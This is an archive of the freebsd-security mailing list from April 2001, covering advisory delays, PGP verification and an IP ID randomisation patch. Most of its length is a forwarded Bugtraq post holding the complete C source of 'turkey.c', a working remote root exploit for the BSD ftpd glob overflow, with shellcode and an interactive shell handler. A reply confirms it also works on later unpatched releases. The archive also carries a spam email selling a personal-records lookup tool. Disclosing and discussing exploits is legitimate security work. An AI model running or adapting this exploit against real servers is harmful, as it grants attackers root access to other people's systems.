From owner-freebsd-security Sun Apr 15 20: 8:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from gamma.shell-station.com (gamma.shell-station.com [65.195.31.130]) by hub.freebsd.org (Postfix) with ESMTP id 13D5837B423 for ; Sun, 15 Apr 2001 20:08:17 -0700 (PDT) (envelope-from idem@idemnia.net) Received: from HSE-QuebecCity-ppp81832.qc.sympatico.ca (idem@HSE-QuebecCity-ppp81832.qc.sympatico.ca [64.229.237.243]) by gamma.shell-station.com (8.11.3/8.9.3) with ESMTP id f3G37mu16525; Sun, 15 Apr 2001 20:07:49 -0700 (PDT) (envelope-from idem@idemnia.net) Date: Sun, 15 Apr 2001 23:08:18 -0400 (EDT) From: =?X-UNKNOWN?Q?F=E9lix-Antoine_Paradis?= X-X-Sender: To: Chris Byrnes Cc: Will Andrews , Subject: RE: PGP signed SAs. In-Reply-To: Message-ID: <20010415230756.H12289-100000@idemnia.ath.cx> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > I'm using the Windows PGP client, and yes. > > > > Maybe windows dinked with the EOL? That would affect verification. > > Not sure. I deleted the key I had saved, and reimported it from the key > server, and still the same message. > > Perhaps someone has a clue? I don't. > Try to get it from the FreeBSD website... it works for me... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 15 21: 7:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from dns1.tennex.co.jp (dns1.tennex.co.jp [210.169.158.19]) by hub.freebsd.org (Postfix) with ESMTP id 0B07837B422 for ; Sun, 15 Apr 2001 21:07:38 -0700 (PDT) (envelope-from kingkong.here.in@newyorkcity.com) Received: from svb210.tennex.co.jp (t-navi.tennex.co.jp [210.169.158.22]) by dns1.tennex.co.jp (8.9.3/3.7W) with ESMTP id NAA15486; Mon, 16 Apr 2001 13:00:34 +0900 Received: from yahoo.com ([38.29.222.227]) by svb210.tennex.co.jp (Lotus Domino Release 5.0.4a) with SMTP id 2001041612594635:478 ; Mon, 16 Apr 2001 12:59:46 +0900 From: landafo@jahoopa.com Subject: All new! - Get the inside scoop on Anyone or Anything! X-Mailer: Mozilla 4.61 [en] (Win95; I) Message-Id: <7fu86t.ptk7gk4wiv2g564@yahoo.com> Date: Sun, 15 Apr 2001 19:01:49 -0100 To: greenihl@ireland.com X-MIMETrack: Itemize by SMTP Server on svb210/Global1(Release 5.0.4a |July 24, 2000) at 2001/04/16 01:00:13 PM, Serialize by Router on svb210/Global1(Release 5.0.4a |July 24, 2000) at 2001/04/16 01:00:14 PM MIME-Version: 1.0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Internet Investigator=20

New for <= font=20 color=3D"#0000cc">2001
Internet Software Program for Online Investigations

- Find Out Anything about Anyone= =20 Online -

Uncover Information about: neighbors, enemies, friends, debtors, employees= ,=20 your boss,
yourself, relatives, former school or military buddies, even a new love= =20 interest!

Become an "Internet=20 Investigator™" and explore an exciting new world
of valuable information.

With Internet Investigator™ You Can Investigate:

People, = credit=20 records, social security numbers, employment records, school records, criminal records, driving records, addresses, phone numbers=20 (even some unlisted), hidden assets,
family trees and a whole lot more!

<= FONT=20 face=3D"Arial, Helvetica, sans-serif">Click Here for more Information

All requests to be taken off our mailing list are AUTOMATICALLY and=20 IMMEDIATELY honored upon receipt.
Click here to be taken off our list.

Each year in the U.S. alone, the "postal" bulk mail industry=20 consumes over 450 million trees just to make the paper used in sending their=20 advertisements and promotions. Using email instead can significantly reduce this=20 consumption, while at the same time decreasing the billions of tons of paper waste=20 filling our landfills.
Save the trees, save the planet, use email!

 

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 15 22:23:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 5778A37B423 for ; Sun, 15 Apr 2001 22:23:19 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [127.0.0.1] (helo=softweyr.com ident=e62c62b4fb3fff12be1c969f1fbfb626) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14p1So-0000LP-00; Sun, 15 Apr 2001 23:22:14 -0600 Message-ID: <3ADA8186.FB33DBC9@softweyr.com> Date: Sun, 15 Apr 2001 23:22:14 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Stanley Hopcroft Cc: freebsd-security@freebsd.org Subject: Re: Security Announcements? References: <20010410215014.A8173@scientia.demon.co.uk> <20010411094026.B80253@IPAustralia.Gov.AU> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Stanley Hopcroft wrote: > On Tue, Apr 10, 2001 at 03:43:47PM -0700, Nicole Harrington wrote: > > > > From my perspective it took days for people to stop discussing what patch > > was best for ntpd and I still never heard a full resolution on the mailing > > list. No official blessing of a patch other than what I would get via CVSUP. I > > have production servers, I can't run a CVsup everyday, let alone a make world. > > Here here. I have shut down ntpd. I can't determine from the debate > about the ntp patch what I should use. There is no SA .... It would be important at this point not to confuse "There is no SA" with "I can't pull my head far enough out of my haunches to find the SA": http://www.FreeBSD.org/cgi/getmsg.cgi?fetch=334860+341475+/usr/local/www/db/text/2001/freebsd-security/20010415.freebsd-security That took all of ONE SEARCH, searching in the obvious "security" mailing list, to locate. > > Yes I may have missed a few mails or something. But expecting people to spend > > their days tracking down patches and notices abt problems kinda negates the > > whole idea of a security mailing and notification. > > Yes. If I found it in the security archives, it must have gone out on the security mailing list. In fact, I even see where I forwarded it to work, so we could evaluate the version of ntp we use there, when I orginally received it on the security mailing list. So what we're all kvetching about here is failing to read, or even notice, a security alert that was sent out? What do you want? If you want to pay some money for security support, we can probably send Albert and Bill around the world with a baseball bat to beat you over the head every time a security alert is issued, just to make sure you don't miss it. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 15 23:34:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from entropy.inserted.net (async2-win-isp-1.nas.one.net.au [61.12.142.3]) by hub.freebsd.org (Postfix) with SMTP id 9D09337B42C for ; Sun, 15 Apr 2001 23:34:06 -0700 (PDT) (envelope-from steve@inserted.net) Received: (qmail 77801 invoked from network); 16 Apr 2001 06:11:36 -0000 Received: from fortune.inserted.net (HELO fortune) (192.168.0.2) by entropy.inserted.net with SMTP; 16 Apr 2001 06:11:36 -0000 Date: Mon, 16 Apr 2001 16:13:32 -0700 From: Stephen Ware X-Mailer: The Bat! (v1.51) Personal Reply-To: Stephen Ware X-Priority: 3 (Normal) Message-ID: <133241393555.20010416161332@inserted.net> To: Wes Peters Cc: Stanley Hopcroft , freebsd-security@freebsd.org Subject: Re[2]: Security Announcements? In-Reply-To: <3ADA8186.FB33DBC9@softweyr.com> References: <20010410215014.A8173@scientia.demon.co.uk> <20010411094026.B80253@IPAustralia.Gov.AU> <3ADA8186.FB33DBC9@softweyr.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sunday, April 15, 2001, 10:22:14 PM, Wes Peters wrote: >> On Tue, Apr 10, 2001 at 03:43:47PM -0700, Nicole Harrington wrote: ^^^^^^ Note the date of the question about the lack of SA. WP> It would be important at this point not to confuse "There is no SA" with WP> "I can't pull my head far enough out of my haunches to find the SA": Or, perhaps it's a case of "I don't know which day comes first." Take a closer look at the date the SA was released to the mailing lists, and ask yourself how Ms Harrington was to search for a message that isn't going to be created for 2 days. I think this thread is dead. -- Best regards, Stephen mailto:steve@inserted.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 15 23:53: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from redlance.singingtree.com (pool.207.151.148.221.cinenet.net [207.151.148.221]) by hub.freebsd.org (Postfix) with ESMTP id BFE6737B424 for ; Sun, 15 Apr 2001 23:52:57 -0700 (PDT) (envelope-from mikey@singingtree.com) Received: from localhost (mikey@localhost) by redlance.singingtree.com (8.11.3/8.11.2) with ESMTP id f3G6qsK32610 for ; Sun, 15 Apr 2001 23:52:56 -0700 (PDT) (envelope-from mikey@singingtree.com) Date: Sun, 15 Apr 2001 23:52:54 -0700 (PDT) From: "Michael A. Dickerson" To: freebsd-security@freebsd.org Subject: Re: Security Announcements? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wes Peters wrote: > So what we're all kvetching about here is failing to read, or > even notice, a security alert that was sent out? What do you want? > If you want to pay some money for security support, we can probably > send Albert and Bill around the world with a baseball bat to beat > you over the head every time a security alert is issued, just to > make sure you don't miss it. Uh, no. Notice the date on the security advisory, which was more than one week after the bug was publicly announced, and a patch made available. That's what people were worried about. Now, Kris has since explained that he was out of town. That's bound to happen sometimes, unless someone starts chaining the (volunteer) security officer to his computer. However, the fact that the advisories are sometimes delayed is still a problem for some people. For instance, I might be unable to read -stable for a few days, but I have a perl script that pages me when advisories are issued. Obviously, I can't rely on that mechanism if advisories come out long after bugs are announced in other public forums. And who knows how many people only subscribe to freebsd-security-notifications and think they're safe for it? M.D. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 2: 3:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-139.dsl.lsan03.pacbell.net [63.207.60.139]) by hub.freebsd.org (Postfix) with ESMTP id DC9B537B422; Mon, 16 Apr 2001 02:03:15 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C6CB866D8B; Mon, 16 Apr 2001 02:03:11 -0700 (PDT) Date: Mon, 16 Apr 2001 02:03:11 -0700 From: Kris Kennaway To: Mike Silbersack Cc: Mark T Roberts , freebsd-security@FreeBSD.ORG, net@FreeBSD.org Subject: Re: non-random IP IDs Message-ID: <20010416020311.A1292@xor.obsecurity.org> References: <001f01c0c30b$805b0840$d2e2fdce@netrex.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="fdj2RfSjLxBAspz7" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from silby@silby.com on Thu, Apr 12, 2001 at 12:40:32AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --fdj2RfSjLxBAspz7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 12, 2001 at 12:40:32AM -0500, Mike Silbersack wrote: > Each IP packet sent has with it a 16-bit ID. The numbers must remain > unique over a short period of time so fragmentation can work properly. As > such, everything except recent openbsds simple increments the id by 1 for > each packet sent out. >=20 > As a result, you can tell the number of packets sent on an idle host by > seeing the difference in id numbers for the packets it sends back to you. > It's not really that important of an issue, don't worry about it. Here's a patch ported from OpenBSD which randomizes this (supposedly such that it respects the constraint of not wrapping within the prescribed time period). I should wrap it in a sysctl, I guess. http://www.freebsd.org/~kris/ipid.patch Comments? Kris --fdj2RfSjLxBAspz7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE62rVOWry0BWjoQKURAmEnAKCPsC4cKouTayuBqji58oWOUH22DACdF7A0 3Is0lLB0DmTyUzAHsY6q/rU= =WMzk -----END PGP SIGNATURE----- --fdj2RfSjLxBAspz7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 2:16:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw2.dnepr.net (CoreGW2-TBone.dnepr.net [195.24.156.97]) by hub.freebsd.org (Postfix) with ESMTP id 9CBDD37B42C for ; Mon, 16 Apr 2001 02:16:03 -0700 (PDT) (envelope-from land@dnepr.net) Received: from dnepr.net (dnepr.net [195.24.156.98]) by gw2.dnepr.net (8.8.8/8.6.18/01) with ESMTP id MAA23530 for ; Mon, 16 Apr 2001 12:16:07 +0300 (EET DST) From: land@dnepr.net Received: (from land@localhost) by dnepr.net (8.8.8/8.8.8) id MAA12705 for security@freebsd.org; Mon, 16 Apr 2001 12:16:07 +0300 (EEST) X-POP3-RCPT: security@freebsd.org Date: Mon, 16 Apr 2001 12:16:07 +0300 To: security@freebsd.org Subject: (fwd) Remote BSD ftpd glob exploit Message-ID: <20010416121606.A11997@dnepr.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does exploit work on 4.1-RELEASE or 4-STABLE ? ----- Forwarded message from fish stiqz ----- From: fish stiqz Subject: Remote BSD ftpd glob exploit To: BUGTRAQ@SECURITYFOCUS.COM Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com User-Agent: Mutt/1.2.5i Date: Sat, 14 Apr 2001 16:41:43 -0400 Reply-To: fish stiqz Hello, Here is a remote exploit for the glob bug discussed earlier here. It works on FreeBSD 4.0-RELEASE, and with the right address, should work on others as well. It requires a user account in a non-chrooted environment (normal user account). If anyone gets this working on other systems, let me know. Take care, have a good weekend. - fish stiqz. -- fish stiqz irc>irl?werd():lame() /* * turkey.c - "gobble gobble" * * REMOTE ROOT EXPLOIT FOR BSD FTPD * by: fish stiqz 04/13/2001 * * shouts: trey, dono and irc.analog.org. * German_gu (whats up? =). * * Notes: * Doesn't break chroot, requires an account. * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define FTP_PORT 21 #define MAXX(a,b) ((a) < (b) ? (b) : (a)) #define NOP 0x41 /* inc %ecx, works just like a nop, easier to read */ extern int errno; int debug_read; int debug_write; /* * Non-ripped 45 byte bsd shellcode which does setuid(0) and execve() * and does not contain any '/' characters. */ char bsdcode[] = "\x29\xc0\x50\xb0\x17\x50\xcd\x80" "\x29\xc0\x50\xbf\x66\x69\x73\x68" "\x29\xf6\x66\xbe\x49\x46\x31\xfe" "\x56\xbe\x49\x0b\x1a\x06\x31\xfe" "\x56\x89\xe3\x50\x54\x50\x54\x53" "\xb0\x3b\x50\xcd\x80"; /* architecture structure */ struct arch { char *description; char *shellcode; unsigned long code_addr; }; /* available targets */ struct arch archlist[] = { { "FreeBSD 4.0-RELEASE (FTP server (Version 6.00LS))", bsdcode, 0xbfbfc2a8 } }; /* * function prototypes. */ void *Malloc(size_t); void *Realloc(void *, size_t); char *Strdup(char *); int get_ip(struct in_addr *, char *); int tcp_connect(char *, unsigned int); ssize_t write_sock(int, void *, size_t); ssize_t read_sock(int, void *, size_t); int ftp_login(int, char *, char *); char *ftp_gethomedir(int); int ftp_mkdir(int, char *); int ftp_chdir(int, char *); int ftp_quit(int); void possibly_rooted(int); void send_glob(int, char *); char *random_string(void); int ftp_glob_exploit(int, char *, unsigned long, char *); int verify_shellcode(char *); void usage(char *); void list_targets(void); /* * Error cheq'n wrapper for malloc. */ void *Malloc(size_t n) { void *tmp; if((tmp = malloc(n)) == NULL) { fprintf(stderr, "malloc(%u) failed! exiting...\n", n); exit(EXIT_FAILURE); } return tmp; } /* * Error cheq'n strdup. */ char *Strdup(char *str) { char *s; if((s = strdup(str)) == NULL) { fprintf(stderr, "strdup failed! exiting...\n"); exit(EXIT_FAILURE); } return s; } /* * translates a host from its string representation (either in numbers * and dots notation or hostname format) into its binary ip address * and stores it in the in_addr struct passed in. * * return values: 0 on success, != 0 on failure. */ int get_ip(struct in_addr *iaddr, char *host) { struct hostent *hp; /* first check to see if its in num-dot format */ if(inet_aton(host, iaddr) != 0) return 0; /* next, do a gethostbyname */ if((hp = gethostbyname(host)) != NULL) { if(hp->h_addr_list != NULL) { memcpy(&iaddr->s_addr, *hp->h_addr_list, sizeof(iaddr->s_addr)); return 0; } return -1; } return -1; } /* * initiates a tcp connection to the specified host (either in * ip format (xxx.xxx.xxx.xxx) or as a hostname (microsoft.com) * to the host's tcp port. * * return values: != -1 on success, -1 on failure. */ int tcp_connect(char *host, unsigned int port) { int sock; struct sockaddr_in saddress; struct in_addr *iaddr; iaddr = Malloc(sizeof(struct in_addr)); /* write the hostname information into the in_addr structure */ if(get_ip(iaddr, host) != 0) return -1; saddress.sin_addr.s_addr = iaddr->s_addr; saddress.sin_family = AF_INET; saddress.sin_port = htons(port); /* create the socket */ if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) return -1; /* make the connection */ if(connect(sock, (struct sockaddr *) &saddress, sizeof(saddress)) != 0) { close(sock); return -1; } /* everything succeeded, return the connected socket */ return sock; } /* * a wrapper for write to enable us to do some debugging. */ ssize_t write_sock(int fd, void *buf, size_t count) { unsigned int i; if(debug_write == 1) { printf(" > "); for(i = 0; i < count; i++) printf("%c", ((char *)buf)[i]); fflush(stdout); } return write(fd, buf, count); } /* * a wrapper for read to enable us to some debugging. */ ssize_t read_sock(int fd, void *buf, size_t count) { unsigned int i; ssize_t r; r = read(fd, buf, count); if(debug_read == 1) { printf(" < "); for(i = 0; i < r; i++) printf("%c", ((char *)buf)[i]); fflush(stdout); } return r; } /* * FTP LOGIN function. Issues a "USER and then "PASS " * to login to the remote host and checks that command succeeded. */ int ftp_login(int sock, char *username, char *password) { char recvbuf[256]; char *sendbuf; int r; /* get the header */ read_sock(sock, recvbuf, 255); sendbuf = Malloc((MAXX(strlen(username), strlen(password)) + 7) * sizeof(char)); sprintf(sendbuf, "USER %s\n", username); write_sock(sock, sendbuf, strlen(sendbuf)); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; if(atoi(recvbuf) != 331) return 0; sprintf(sendbuf, "PASS %s\n", password); write_sock(sock, sendbuf, strlen(sendbuf)); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; free(sendbuf); if(atoi(recvbuf) == 230) return 1; return 0; } /* * FTP GET HOME DIR function. Issues a "CWD ~" and "PWD" to * force the ftp daemon to print our our current directory. */ char *ftp_gethomedir(int sock) { char recvbuf[256]; char *homedir = NULL; int r; write_sock(sock, "CWD ~\n", 6); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; if(atoi(recvbuf) == 250) { write_sock(sock, "PWD\n", 4); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; if(atoi(recvbuf) == 257) { char *front, *back; front = strchr(recvbuf, '"'); front++; back = strchr(front, '"'); homedir = Malloc((back - front) * sizeof(char)); strncpy(homedir, front, (back - front)); homedir[(back - front)] = 0x0; } } return homedir; } /* * FTP MKDIR function. Issues an "MKD " to create a directory on * the remote host and checks that the command succeeded. */ int ftp_mkdir(int sock, char *dirname) { char recvbuf[512]; char *sendbuf; int r; sendbuf = Malloc((strlen(dirname) + 6) * sizeof(char)); sprintf(sendbuf, "MKD %s\n", dirname); write_sock(sock, sendbuf, strlen(sendbuf)); r = read_sock(sock, recvbuf, 511); recvbuf[r] = 0x0; free(sendbuf); if(atoi(recvbuf) == 257) return 1; return 0; } /* * FTP CWD function. Issues a "CWD " to change directory on * the remote host and checks that the command succeeded. */ int ftp_chdir(int sock, char *dirname) { char recvbuf[512]; char *sendbuf; int r; sendbuf = Malloc((strlen(dirname) + 6) * sizeof(char)); sprintf(sendbuf, "CWD %s\n", dirname); write_sock(sock, sendbuf, strlen(sendbuf)); r = read_sock(sock, recvbuf, 511); recvbuf[r] = 0x0; free(sendbuf); if(atoi(recvbuf) == 250) return 1; return 0; } /* * FTP QUIT function. Issues a "QUIT" to terminate the connection. */ int ftp_quit(int sock) { char recvbuf[256]; int r; write_sock(sock, "QUIT\n", 5); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; close(sock); return 1; } /* * switches between the user and the remote shell (if everything went well). */ void possible_shell(int sock) { char banner[] = "cd /; echo; uname -a; echo; id; echo; echo Welcome to the shell, " "enter commands at will; echo;\n\n"; char buf[1024]; fd_set fds; int r; write(sock, banner, strlen(banner)); for(;;) { FD_ZERO(&fds); FD_SET(fileno(stdin), &fds); FD_SET(sock, &fds); select(255, &fds, NULL, NULL, NULL); if(FD_ISSET(sock, &fds)) { memset(buf, 0x0, sizeof(buf)); r = read (sock, buf, sizeof(buf) - 1); if(r <= 0) { printf("Connection closed.\n"); exit(EXIT_SUCCESS); } printf("%s", buf); } if(FD_ISSET(fileno(stdin), &fds)) { memset(buf, 0x0, sizeof(buf)); read(fileno(stdin), buf, sizeof(buf) - 1); write(sock, buf, strlen(buf)); } } close(sock); } /* * generates a string of 6 random characters. * this is too allow for multiple successful runs, best way to do * this is to actually remove the created directories. */ char *random_string(void) { int i; char *s = Malloc(7); srand(time(NULL)); for(i = 0; i < 6; i++) s[i] = (rand() % (122 - 97)) + 97; s[i] = 0x0; return s; } /* * sends the glob string, to overflow the daemon. */ void send_glob(int sock, char *front) { char globbed[] = "CWD ~/NNNNNN*/X*/X*/X*\n"; int i, j; for(i = 6, j = 0; i < 6 + 6; i++, j++) globbed[i] = front[j]; write_sock(sock, globbed, strlen(globbed)); printf("[5] Globbed commands sent.\n"); /* start our shell handler */ possible_shell(sock); } /* * Exploitation routine. * Makes 4 large directories and then cwd's to them. */ int ftp_glob_exploit(int sock, char *homedir, unsigned long addy, char *shellcode) { char dir[300]; int i, j; int total = strlen(homedir) + 1; int align2; char *rstring = random_string(); /* go to the writeable directory */ if(!ftp_chdir(sock, homedir)) { fprintf(stderr, "[-] Failed to change directory, aborting!\n"); return 0; } for(i = 0; i < 4; i++) { memset(dir, 0x0, 299); switch(i) { case 0: /* first dir == shellcode */ memcpy(dir, rstring, strlen(rstring)); memset(dir + strlen(rstring), NOP, 255 - strlen(rstring)); strcpy(&dir[(255 - strlen(shellcode))], shellcode); break; case 3: /* address buffer */ /* calculate the alignment */ align2 = total % sizeof(long); align2 = sizeof(long) - align2; printf("[3] Calculated alignment = %d, total = %d\n", align2, total); strcpy(dir, "XXXX"); memset(dir + 4, 'X', align2); for(j = 4 + align2; j < 250; j += 4) *(unsigned long *)(&dir[j]) = addy; break; default: /* cases 1 and 2, extra overflow bytes */ memset(dir, 'X', 255); break; } total += strlen(dir) + 1; if(!ftp_mkdir(sock, dir)) { fprintf(stderr, "[-] Failed to generate directories, aborting!\n"); return 0; } if(!ftp_chdir(sock, dir)) { fprintf(stderr, "[-] Failed to change directory, aborting!\n"); return 0; } } printf("[4] Evil directories created.\n"); if(!ftp_chdir(sock, homedir)) { fprintf(stderr, "[-] Failed to cwd back to %s, aborting!\n", homedir); return 0; } /* perform the final attack */ send_glob(sock, rstring); return 1; } /* * returns true if the shellcode passes, false otherwise. */ int verify_shellcode(char *code) { int i, s = 0; if(strlen(code) > 255) { fprintf(stderr, "[-] Shellcode length exceeds 255, aborting!\n"); return 0; } for(i = 0; i < strlen(code); i++) { if(code[i] == '/') s++; } if(s > 0) { fprintf(stderr, "[-] Shellcode contains %u slash characters, aborting\n", s); return 0; } return 1; } /* * displays the usage message and exits. */ void usage(char *p) { fprintf(stderr, "BSD ftpd remote exploit by fish stiqz \n" "usage: %s [options]\n" "\t-c\tremote host to connect to\n" "\t-o\tremote port to use\n" "\t-u\tremote username\n" "\t-p\tremote password\n" "\t-i\tget the password interactively\n" "\t-t\tpredefined target (\"-t list\" to list all targets)\n" "\t-d\twriteable directory\n" "\t-l\tshellcode address\n" "\t-v\tdebug level [0-2]\n" "\t-s\tseconds to sleep after login (debugging purposes)\n" "\t-h\tdisplay this help\n", p); exit(EXIT_FAILURE); } /* * lists all available targets. */ void list_targets(void) { int i; printf("Available Targets:\n"); for(i = 0; i < sizeof(archlist) / sizeof(struct arch); i++ ) printf("%i: %s\n", i, archlist[i].description); return; } int main(int argc, char **argv) { int sock, c; int port = FTP_PORT; int debuglevel = 0; char *host = NULL; char *username = NULL; char *password = NULL; struct arch *arch = NULL; char *shellcode = bsdcode; int target = 0; int sleep_time = 0; unsigned long code_addr = 0; char *homedir = NULL;; /* grab command line parameters */ while((c = getopt(argc, argv, "c:o:u:p:it:d:l:v:s:h")) != EOF) { switch(c) { case 'c': host = Strdup(optarg); break; case 'o': port = atoi(optarg); break; case 'u': username = Strdup(optarg); break; case 'p': password = Strdup(optarg); /* hide the password from ps */ memset(optarg, 'X', strlen(optarg)); break; case 'i': password = getpass("Enter remote password: "); break; case 't': if(strcmp(optarg, "list") == 0) { list_targets(); return EXIT_FAILURE; } target = atoi(optarg); arch = &(archlist[target]); code_addr = arch->code_addr; shellcode = arch->shellcode; break; case 'd': homedir = Strdup(optarg); break; case 'l': code_addr = strtoul(optarg, NULL, 0); break; case 'v': debuglevel = atoi(optarg); break; case 's': sleep_time = atoi(optarg); break; default: usage(argv[0]); break; } } /* check for required options */ if(host == NULL || username == NULL || password == NULL || code_addr == 0) usage(argv[0]); /* setup the debug level */ switch(debuglevel) { case 1: debug_read = 1; debug_write = 0; break; case 2: debug_read = 1; debug_write = 1; break; default: debug_read = 0; debug_write = 0; break; } /* make sure the shellcode is good */ if(!verify_shellcode(shellcode)) return EXIT_FAILURE; /* initiate the tcp connection to the ftp server */ if((sock = tcp_connect(host, port)) == -1) { fprintf(stderr, "[-] Connection to %s failed!\n", host); ftp_quit(sock); return EXIT_FAILURE; } if(arch == NULL) printf("[0] Connected to host %s.\n", host); else printf("[0] Connected to host %s\n\tAs type %s.\n", host, arch->description); /* login */ if(!ftp_login(sock, username, password)) { fprintf(stderr, "[-] Login failed, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } /* hey, so im anal! */ memset(password, 0x0, strlen(password)); free(username); free(password); printf("[1] Login succeeded.\n"); if(sleep != 0) sleep(sleep_time); if(homedir == NULL) { /* get home directory */ if((homedir = ftp_gethomedir(sock)) == NULL) { fprintf(stderr, "[-] Couldn't retrieve home directory, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } } printf("[2] Home directory retrieved as \"%s\", %u bytes.\n", homedir, strlen(homedir)); /* do the exploitation */ if(!ftp_glob_exploit(sock, homedir, code_addr, shellcode)) { fprintf(stderr, "[-] exploit failed, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } ftp_quit(sock); free(host); return EXIT_SUCCESS; } ----- End forwarded message ----- -- Best regards, Andrey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 2:27:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.96.18]) by hub.freebsd.org (Postfix) with SMTP id BC72037B449 for ; Mon, 16 Apr 2001 02:27:09 -0700 (PDT) (envelope-from venglin@freebsd.lublin.pl) Received: (qmail 35487 invoked from network); 16 Apr 2001 09:27:02 -0000 Received: from unknown (HELO lagoon.freebsd.lublin.pl) (212.182.115.11) by 0 with SMTP; 16 Apr 2001 09:27:02 -0000 Received: (qmail 15588 invoked from network); 16 Apr 2001 09:27:02 -0000 Received: from unknown (HELO riget.scene.pl) () by 0 with SMTP; 16 Apr 2001 09:27:02 -0000 Received: (qmail 15585 invoked by uid 1001); 16 Apr 2001 09:27:02 -0000 Date: Mon, 16 Apr 2001 11:27:02 +0200 From: Przemyslaw Frasunek To: security@freebsd.org Subject: Re: (fwd) Remote BSD ftpd glob exploit Message-ID: <20010416112702.W700@riget.scene.pl> References: <20010416121606.A11997@dnepr.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010416121606.A11997@dnepr.net>; from land@dnepr.net on Mon, Apr 16, 2001 at 12:16:07PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 16, 2001 at 12:16:07PM +0300, land@dnepr.net wrote: > Does exploit work on 4.1-RELEASE or 4-STABLE ? Yes, it will work on 4.1.1-RELEASE and 4.2-STABLE before correction date (29 March). My version of exploit was tested on my 4.2-STABLE: http://www.frasunek.com/sources/security/ftpd-bsd.pl -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 2:48:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 09C2337B424; Mon, 16 Apr 2001 02:48:06 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 441C5678BE; Mon, 16 Apr 2001 02:48:05 -0700 (PDT) Date: Mon, 16 Apr 2001 02:48:05 -0700 From: Kris Kennaway To: Kris Kennaway Cc: Mike Silbersack , Mark T Roberts , 